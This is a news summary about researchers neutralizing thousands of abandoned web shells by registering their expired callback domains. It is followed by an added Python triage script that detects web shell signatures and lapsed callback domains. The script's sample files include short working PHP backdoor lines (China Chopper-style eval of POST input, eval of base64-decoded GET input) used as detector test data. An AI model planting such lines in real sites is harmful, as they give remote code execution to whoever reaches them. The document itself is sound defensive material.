BleepingComputer reports that more than 4,000 live web backdoors, abandoned by the threat actors who deployed them, have been identified, taken over, and ultimately neutralized by registering the expired domains those backdoors were calling home to.
The web shells discovered included China Chopper, a fixture of advanced persistent threat operations, c99shell, and r57shell, as well as a backdoor with capabilities resembling those of the Lazarus Group, according to a report from WatchTowr Labs. The backdoors had compromised several government organizations in China, Bangladesh, and Nigeria, as well as universities and other higher-education institutions in China, South Korea, and Thailand. Ownership of all 40 domains used to identify the web shells has been transferred to The Shadowserver Foundation, which has since sinkholed the backdoors' communication infrastructure, WatchTowr Labs researchers said. The researchers noted that the findings point to the potential for expired domains to be reused in future cyberattacks.
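The defender-side lesson in the report is that a forgotten web shell keeps trying to reach a hard-coded callback domain long after the attacker has let that domain lapse, so whoever registers it next inherits the backdoor. The script below is an added example, not code from BleepingComputer, WatchTowr Labs or The Shadowserver Foundation: it triages files under a web root for coarse, widely documented indicators of the shell families named above, pulls out any hostnames embedded in a flagged file, and reports which of those callback domains are no longer registered. The sample web root and the registration table are constructed here so it runs offline; in practice the registration status would come from an RDAP or WHOIS lookup done separately.

```python
"""Triage web-root files for common web shell indicators and extract the
hard-coded callback domains they reference, then flag callbacks whose
domain registration has lapsed.

Added example, not the report's or any project's own tooling. Sample files
and the registration table are constructed; signature patterns are coarse
and meant for triage, not as a definitive classifier."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Indicator patterns per family (well-known strings, suitable for triage).
SIGNATURES = {
    # China Chopper's server side is a one-liner that evals POST input.
    "china_chopper": re.compile(r"@?eval\s*\(\s*\$_(POST|REQUEST)\s*\[", re.I),
    "c99shell": re.compile(r"c99shell", re.I),
    "r57shell": re.compile(r"r57shell", re.I),
    # Generic: base64-decoded payload fed straight into eval().
    "eval_base64": re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.I),
}

# Hostnames inside quoted strings or URLs; good enough to pull callback
# domains out of shell source for manual review.
DOMAIN_RE = re.compile(r"(?:https?://)?\b((?:[a-z0-9-]+\.)+[a-z]{2,})\b", re.I)


@dataclass
class Finding:
    path: str
    families: List[str]
    domains: List[str] = field(default_factory=list)


def scan_file(path: str, content: str) -> Optional[Finding]:
    """Return a Finding if any signature matches, else None."""
    families = [name for name, rx in SIGNATURES.items() if rx.search(content)]
    if not families:
        return None
    domains = sorted({m.group(1).lower() for m in DOMAIN_RE.finditer(content)})
    return Finding(path, families, domains)


def scan_tree(files: Dict[str, str]) -> List[Finding]:
    """Scan a mapping of path -> file content (a stand-in for walking a web root)."""
    return [f for p, c in files.items() if (f := scan_file(p, c))]


def unregistered_callbacks(findings: List[Finding],
                           registered: Dict[str, bool]) -> Dict[str, List[str]]:
    """Map each flagged file to the callback domains whose registration is
    False (lapsed). `registered` is supplied by the caller, normally from
    an RDAP/WHOIS lookup; unknown domains are left out rather than guessed."""
    out: Dict[str, List[str]] = {}
    for f in findings:
        lapsed = [d for d in f.domains if registered.get(d) is False]
        if lapsed:
            out[f.path] = lapsed
    return out


# Constructed sample web root (not real compromised files).
SAMPLE_FILES = {
    "/var/www/html/index.php": "<?php echo 'hello'; ?>",
    "/var/www/html/uploads/img.php": "<?php @eval($_POST['pass']); ?>",
    "/var/www/html/tmp/x.php": (
        "<?php // c99shell v1.0\n"
        "$c2 = 'http://update.example-expired.test/ping';\n"
        "eval(base64_decode($_GET['q'])); ?>"
    ),
}
# Constructed registration table: True = registered, False = lapsed.
SAMPLE_REGISTRATION = {"update.example-expired.test": False}

if __name__ == "__main__":
    found = scan_tree(SAMPLE_FILES)
    for f in found:
        print(f.path, f.families, f.domains)
    print(unregistered_callbacks(found, SAMPLE_REGISTRATION))
```

A file that matches a signature but references no lapsed domain still deserves removal; the registration check only prioritizes the shells that a third party could take over by registering a name, which is exactly the class the report describes.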